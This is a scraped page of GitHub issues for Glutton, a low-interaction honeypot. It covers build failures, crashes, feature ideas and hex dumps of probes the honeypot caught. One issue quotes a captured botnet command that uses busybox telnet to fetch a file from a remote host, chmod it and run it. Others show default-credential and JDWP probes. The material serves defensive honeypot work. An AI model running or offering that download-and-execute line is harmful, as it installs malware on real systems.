mushorg / glutton Goto Github PK
View Code? Open in Web Editor NEWGeneric Low Interaction Honeypot
License: MIT License
Generic Low Interaction Honeypot
License: MIT License
This looks interesting: https://github.com/dutchcoders/sshproxy
Currently the Travis tests do not check if the docker image builds successfully. There are two ways that I can see this going. The first is to build the docker image and then run the unit test on it too and the other is to just build the docker image.
Has anyone seen events that look like those described here? https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
Investigate if we get enough information from /proc/net/nf_conntrack
or /proc/net/ip_conntrack
The container should be as minimal as possible. I guess either Alpine or even smaller.
I done previous steps in new readme. But glide install is failing for me tried changing VM but same result.
root@beta2:~/gowork/src/github.com/mushorg/glutton# glide install
[INFO] Downloading dependencies. Please wait...
[INFO] --> Found desired version locally github.com/1lann/go-sip 68e86c65407ef8cf672ae38526e7f3d29944b94f!
[INFO] --> Found desired version locally github.com/coreos/go-iptables 5463fbac3bcc6b990663941c2e12660d19f6b36d!
[INFO] --> Found desired version locally github.com/docker/distribution fb0bebc4b64e3881cc52a2478d749845ed76d2a8!
[INFO] --> Found desired version locally github.com/docker/engine-api 4290f40c056686fcaa5c9caf02eac1dde9315adf!
[INFO] --> Found desired version locally github.com/docker/go-connections 9670439d95da2651d9dfc7acc5d2ed92d3f25ee6!
[INFO] --> Found desired version locally github.com/docker/go-units 0dadbb0345b35ec7ef35e228dabb8de89a65bf52!
[INFO] --> Found desired version locally github.com/google/gopacket b83f94714c36e30ce851be1d5a0a5226f9f1bca4!
[INFO] --> Found desired version locally github.com/kung-foo/freki b6a126f46f7b0ce15cdc1d50df8d3626377ff7a7!
[INFO] --> Found desired version locally github.com/Microsoft/go-winio fff283ad5116362ca252298cfc9b95828956d85d!
[INFO] --> Found desired version locally github.com/opencontainers/go-digest aa2ec055abd10d26d539eb630a92241b781ce4bc!
[INFO] --> Found desired version locally github.com/pkg/errors 645ef00459ed84a119197bfb8d8205042c6df63d!
[INFO] --> Found desired version locally github.com/satori/go.uuid b061729afc07e77a8aa4fad0a2fd840958f1942a!
[INFO] --> Found desired version locally github.com/sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO] --> Found desired version locally github.com/Sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO] --> Found desired version locally gopkg.in/yaml.v2 a5b47d31c556af34a302ce5d659e6fea44d90de0!
[INFO] --> Fetching golang.org/x/net
[INFO] --> Fetching golang.org/x/sys
[WARN] Unable to checkout golang.org/x/sys
[ERROR] Update failed for golang.org/x/sys: Cannot detect VCS
[WARN] Unable to checkout golang.org/x/net
[ERROR] Update failed for golang.org/x/net: Cannot detect VCS
[ERROR] Failed to install: Cannot detect VCS
Cannot detect VCS
INFO[20219] [telnet ] recv: "/bin/busybox satori\x00\r\n"
INFO[20220] [telnet ] send: "> "
Seeing lots of those and no further stage. Ideas?
There is no ports.yml source files.
cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
root@debian8template:/# cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
cp: cannot stat ‘/opt/go/src/github.com/mushorg/glutton/config/ports.yml’: No such file or directory
I ran glutton and tried to connect from localhost telnet it crashed showing following error
My VM is having OS - Debian GNU/Linux 8
root@debian8template:~# go run /opt/go/src/github.com/mushorg/glutton/app/server.go -log /tmp/glutton.log
_____ _ _ _
/ ____| | | | | |
| | __| |_ _| |_| |_ ___ _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
\_____|_|\__,_|\__|\__\___/|_| |_|
INFO[0000] [glutton ] Loading rules from: /etc/glutton/rules.yaml
INFO[0000] [glutton ] Rules: [Rule: tcp dst port 5001 Rule: tcp dst port 23 or port 2323 or port 23231 Rule: tcp]
INFO[0000] [freki ] starting freki on [x.x.x.55]
INFO[0000] [freki ] starting proxy.tcp on 6000
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x404c50]
goroutine 27 [running]:
panic(0x753ac0, 0xc4200120b0)
/usr/local/go/src/runtime/panic.go:500 +0x1a1
main.main.func3.1(0xc4212e4c80, 0xc421305580, 0xc42131ce80, 0xc42133ef40, 0xbb3440, 0xc420024000)
/opt/go/src/github.com/mushorg/glutton/app/server.go:161 +0x200
created by main.main.func3
/opt/go/src/github.com/mushorg/glutton/app/server.go:194 +0x14c
exit status 2
I have this error many times.
2017/11/28 18:31:16 DEBUG [freki ] new TCP connection x.x.x.x:x->22
2017/11/28 18:31:16 DEBUG [contable] registering x.x.x.x:x->22
2017/11/28 18:31:16 ERROR [user.tcp] panic: runtime error: invalid memory address or nil pointer dereference
2017/11/28 18:31:16 ERROR [user.tcp] stacktrace:
goroutine 21245 [running]:
runtime/debug.Stack(0xc42000e3f0, 0xa89c2a, 0x15)
/usr/local/go/src/runtime/debug/stack.go:24 +0x79
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1.1(0xfc1960, 0xc42000e5f8)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:66 +0xda
panic(0x9c4ee0, 0xfa6f90)
/usr/local/go/src/runtime/panic.go:489 +0x2cf
github.com/mushorg/glutton.(*sshProxy).handle(0x0, 0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0x0, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/proxy_ssh.go:131 +0xb2
github.com/mushorg/glutton.(*Glutton).mapProtocolHandlers.func9(0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0xc42141e808, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/protocols.go:51 +0x56
github.com/mushorg/glutton.(*Glutton).registerHandlers.func1(0xfc1960, 0xc42000e5f8, 0xc422b9b950, 0xc42000e5f8, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/glutton.go:214 +0x3d3
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1(0xfc1960, 0xc42000e5f8, 0xc421430300, 0xc422b9b950, 0xc4214302e0)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:70 +0x7c
created by github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:74 +0x32c
If Glutton is started as root, we should drop privileges to the nobody
user.
How to redirect all traffic to the port we are listening on.
How to set the sshd port to a different port.
How to except the sshd port from the redirect so we can connect to the machine.
Create a PCAP, pass it to TShark (https://www.wireshark.org/docs/man-pages/tshark.html) for dissection and use the protocol info to pick the right handler.
We want to store the traffic/payload of the requests. We should consider pcap.
http://www.devdungeon.com/content/packet-capture-injection-and-analysis-gopacket
Similar to this: https://github.com/dutchcoders/troje
I'd like to have a handler that I can assign to ports:
ports:
21:
default
Default handler should accept the connection and read the package payload. This might trigger additional packages.
Right now the package is dropped if there is no proxy configured for that port. I'd like to see at least a message with the remote IP address and the target port. Are we logging those connection attempts? If not, we should also have a log entry with the same information.
Connection timeout values are hard coded in code:
conn.SetDeadline(time.Now().Add(45 * time.Second))
Expose it as a flag or configuration file attribute so that user can customize.
Cli provides very easy way to register, order and categorize commands, optional flags required to run a command line application. Source of input can also be a json or toml. We can register init and exit code for our application. It provides context that travels to all handler functions of application, so flags can be accessed and set at any level of application with the help of context. Context can be used to track and shutdown goroutines.
I am trying to compile the code. It gives no error in build command but when I run the server file it gives the following error
[glutton ] open rules/rules.yaml: no such file or directory
When you try and start Glutton right now with a interface perimeter it through's the following error:
_____ _ _ _
/ ____| | | | | |
| | __| |_ _| |_| |_ ___ _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
\_____|_|\__,_|\__|\__\___/|_| |_|
panic: interface conversion: interface is string, not bool
goroutine 1 [running]:
panic(0x980a40, 0xc42138cc00)
/usr/local/go/src/runtime/panic.go:500 +0x1a1
github.com/mushorg/glutton.New(0xc421375c20, 0x0, 0x0, 0x0)
/go/src/github.com/mushorg/glutton/glutton.go:42 +0x2b5
main.main()
/go/src/github.com/mushorg/glutton/app/server.go:56 +0x19b
From what I have been able to tell this might have started in PR #91.
@gento I see a bunch of those lately:
fgrep XDVR /mnt/mtd/dep2.sh\x00
after that there is no additional step. I assume they expect a specific response payload.
Glutton eventually fails with:
[user.tcp] accept tcp [::]:5000: accept4: too many open files
Track the number of open connections, how many we drop, how many the client drops, etc.
Use https://golang.org/pkg/net/#TCPListener.SetDeadline to drop connections that time out. Here is a related SO discussion: https://stackoverflow.com/questions/12741386/how-to-know-tcp-connection-is-closed-in-golang-net-package
Readme needs an update after we changed the core to Freki.
Hi all,
Has anyone encountered this compilation issue with the 'make build' command for the latest commits?
I am trying to compile Glutton on ubuntu 16.04.
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make clean
rm -rf bin/
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make build
go build -o $GOPATH/bin/server app/server.go
// # command-line-arguments
app/server.go:75: too many arguments in call to glutton.New
app/server.go:77: gtn.Start undefined (type *glutton.Glutton has no field or method Start)
Makefile:6: recipe for target 'build' failed
make: *** [build] Error 2
test@test:/opt/go/src/github.com/mushorg/glutton$ go version
go version go1.7.1 linux/amd64
test@test:/opt/go/src/github.com/mushorg/glutton$
Any idea to solve this? Thanks!
DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000
DEBU[0648] [contable] registering 47.X.X.X:56695->9000
DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000
00000000 52 45 4d 4f 54 45 20 48 49 5f 53 52 44 4b 5f 44 |REMOTE HI_SRDK_D|
00000010 45 56 5f 47 65 74 48 64 64 49 6e 66 6f 20 4d 43 |EV_GetHddInfo MC|
00000020 54 50 2f 31 2e 30 0d 0a 43 53 65 71 3a 31 37 33 |TP/1.0..CSeq:173|
00000030 0d 0a 41 63 63 65 70 74 3a 74 65 78 74 2f 48 44 |..Accept:text/HD|
00000040 50 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |P..Content-Type:|
00000050 74 65 78 74 2f 48 44 50 0d 0a 46 75 6e 63 2d 56 |text/HDP..Func-V|
00000060 65 72 73 69 6f 6e 3a 30 78 31 30 0d 0a 43 6f 6e |ersion:0x10..Con|
00000070 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 31 35 0d 0a |tent-Length:15..|
00000080 0d 0a 53 65 67 6d 65 6e 74 2d 4e 75 6d 3a 30 0d |..Segment-Num:0.|
00000090 0a |.|
See DICOM: https://en.wikipedia.org/wiki/DICOM
Sample request:
00000000 01 00 00 00 01 00 00 01 00 00 41 4e 59 2d 53 43 |..........ANY-SC|
00000010 50 20 20 20 20 20 20 20 20 20 46 49 4e 44 53 43 |P FINDSC|
00000020 55 20 20 20 20 20 20 20 20 20 00 00 00 00 00 00 |U ......|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 10 00 00 15 31 2e |..............1.|
00000050 32 2e 38 34 30 2e 31 30 30 30 38 2e 33 2e 31 2e |2.840.10008.3.1.|
00000060 31 2e 31 20 00 00 61 01 00 ff 00 30 00 00 16 31 |1.1 ..a....0...1|
00000070 2e 32 2e 38 34 30 2e 31 30 30 30 38 2e 35 2e 31 |.2.840.10008.5.1|
00000080 2e 34 2e 33 31 40 00 00 13 31 2e 32 2e 38 34 30 |[email protected]|
00000090 2e 31 30 30 30 38 2e 31 2e 32 2e 31 40 00 00 13 |.10008.1.2.1@...|
000000a0 31 2e 32 2e 38 34 30 2e 31 30 30 30 38 2e 31 2e |1.2.840.10008.1.|
000000b0 32 2e 32 40 00 00 11 31 2e 32 2e 38 34 30 2e 31 |[email protected]|
000000c0 30 30 30 38 2e 31 2e 32 50 00 00 3a 51 00 00 04 |0008.1.2P..:Q...|
000000d0 00 00 40 00 52 00 00 1b 31 2e 32 2e 32 37 36 2e |[email protected].|
000000e0 30 2e 37 32 33 30 30 31 30 2e 33 2e 30 2e 33 2e |0.7230010.3.0.3.|
000000f0 36 2e 30 55 00 00 0f 4f 46 46 49 53 5f 44 43 4d |6.0U...OFFIS_DCM|
00000100 54 4b 5f 33 36 30 |TK_360|
``
I tried to run the server.go from /app/server.go but getting error in freki package.
I had installed freki using command:
go get github.com/kung-foo/freki
Also tried:
go install golang.org/x/net/context
But same error while running
root@debian8template:/opt/go/src/github.com# go run /opt/go/src/github.com/mushorg/glutton/app/server.go
kung-foo/freki/freki.go:4:2: cannot find package "context" in any of:
/usr/lib/go/src/pkg/context (from $GOROOT)
/opt/go/src/context (from $GOPATH)
Am I doing something wrong here ?
Deployed latest glutton on a Digital Ocean droplet (no docker) and ran basic nmap scan (all TCP ports). Would expect to see the results as all ports open, but some ports did not respond and many "use of closed network connection" errors were logged:
[email protected]:~$ nmap g.g.g.g
Starting Nmap 6.40 ( http://nmap.org ) at 2017-11-17 04:46 GMT
Nmap scan report for g.g.g.g
Host is up (0.18s latency).
PORT STATE SERVICE
1/tcp open tcpmux
3/tcp open compressnet
4/tcp open unknown
6/tcp open unknown
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
20/tcp open ftp-data
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
24/tcp open priv-mail
25/tcp open smtp
26/tcp open rsftp
30/tcp open unknown
...
Logs:
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:40613: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50191: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56103: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56748: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:35219: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:37463: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50858: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:41272: use of closed network connection
read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test
Add capability to add a delay to responses. Delay should be random in range. Global or per port and transport layer.
Add support for mitm https connections, like: https://github.com/malfunkt/hyperfox
DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005
DEBU[1386] [contable] registering 188.X.X.X:47651->5005
DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005
00000000 4a 44 57 50 2d 48 61 6e 64 73 68 61 6b 65 |JDWP-Handshake|
Add support for a config file to whitelist and blacklist ports to handle/listen on.
It's going to be interesting if we can drop the connection in Glutton in a way that it looks like nothing is listening on that port.
Purpose is if you want to only listen on certain ports to make Glutton less obvious.
This is rather confusing and conflicting with the default value of the parameter: https://github.com/mushorg/glutton/blob/master/logger.go#L11
This seems handy: https://github.com/hillu/go-yara
This means no more listener but passing handlers to freki.
I'm running Glutton directly on my server. Every 1-2 days the server becomes unreachable. I assume Glutton crashed and didn't clean up the iptables rules, locking me out from the machine. I have to reboot the box in order to access it again. I tail stderr to a file to see if there is any output, so far without luck. I assume we never execute https://github.com/kung-foo/freki/blob/master/freki.go#L245 on a panic.
On port 3260
00000000 03 81 00 00 00 00 00 5f 40 00 01 37 00 00 00 00 |[email protected]....|
00000010 00 00 00 01 00 01 00 00 00 00 00 01 00 00 00 01 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 49 6e 69 74 69 61 74 6f 72 4e 61 6d 65 3d 69 71 |InitiatorName=iq|
00000040 6e 2e 31 39 39 31 2d 30 35 2e 63 6f 6d 2e 6d 69 |n.1991-05.com.mi|
00000050 63 72 6f 73 6f 66 74 3a 6e 6d 61 70 5f 69 73 63 |crosoft:nmap_isc|
00000060 73 69 5f 70 72 6f 62 65 00 53 65 73 73 69 6f 6e |si_probe.Session|
00000070 54 79 70 65 3d 44 69 73 63 6f 76 65 72 79 00 41 |Type=Discovery.A|
00000080 75 74 68 4d 65 74 68 6f 64 3d 4e 6f 6e 65 00 00 |uthMethod=None..|
I'm still having this issues:
[user.tcp] accept tcp [::]:5000: accept4: too many open files
DEBU[0177] [freki ] new connection x.130:14898->5269
DEBU[0177] [contable] registering x.130:14898->5269
INFO[0178] [log.tcp ]
00000000 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 |<?xml version='1|
00000010 2e 30 27 3f 3e 3c 73 74 72 65 61 6d 3a 73 74 72 |.0'?><stream:str|
00000020 65 61 6d 20 78 6d 6c 6e 73 3a 73 74 72 65 61 6d |eam xmlns:stream|
00000030 3d 27 68 74 74 70 3a 2f 2f 65 74 68 65 72 78 2e |='http://etherx.|
00000040 6a 61 62 62 65 72 2e 6f 72 67 2f 73 74 72 65 61 |jabber.org/strea|
00000050 6d 73 27 20 78 6d 6c 6e 73 3d 27 6a 61 62 62 65 |ms' xmlns='jabbe|
00000060 72 3a 63 6c 69 65 6e 74 27 20 78 6d 6c 3a 6c 61 |r:client' xml:la|
00000070 6e 67 3d 27 65 6e 2d 55 53 27 20 74 6f 3d 27 2e |ng='en-US' to='.|
00000080 27 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 3e |' version='1.0'>
https://github.com/mushorg/glutton/blob/master/logger.go#L15-L16 spot the issue. Maybe add some testing for the logger and log file paths?
See here: http://the-asterisk-book.com/1.6/asterisk-manager-api.html
Example
DEBU[3273] [freki ] new connection xxx:38244->5038
DEBU[3273] [contable] registering xxx:38244->5038
INFO[3281] [log.tcp ] xxx
00000000 41 63 74 69 6f 6e 3a 20 4c 6f 67 69 6e 0d 0a 55 |Action: Login..U|
00000010 73 65 72 6e 61 6d 65 3a 20 61 64 6d 69 6e 0d 0a |sername: admin..|
00000020 53 65 63 72 65 74 3a 20 6d 61 6e 61 67 65 72 0d |Secret: manager.|
00000030 0a 45 76 65 6e 74 73 3a 20 6f 66 66 0d 0a 0d 0a |.Events: off....|
Honeytrap has a couple of service banners we could use to get to the next stages for connections requiring a banner.
Can be found here: https://github.com/armedpot/honeytrap/tree/master/etc/responses
Add a handler able to proxy a request to a local or remote service. For example redirecting ssh requests to a Kippo instance.
A yaml configuration file that has a PORT->IP:PORT mapping. When you get a connection, get the data,
create a TCP client, send it to the proxy target, fetch the response and send it back to the attacker
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.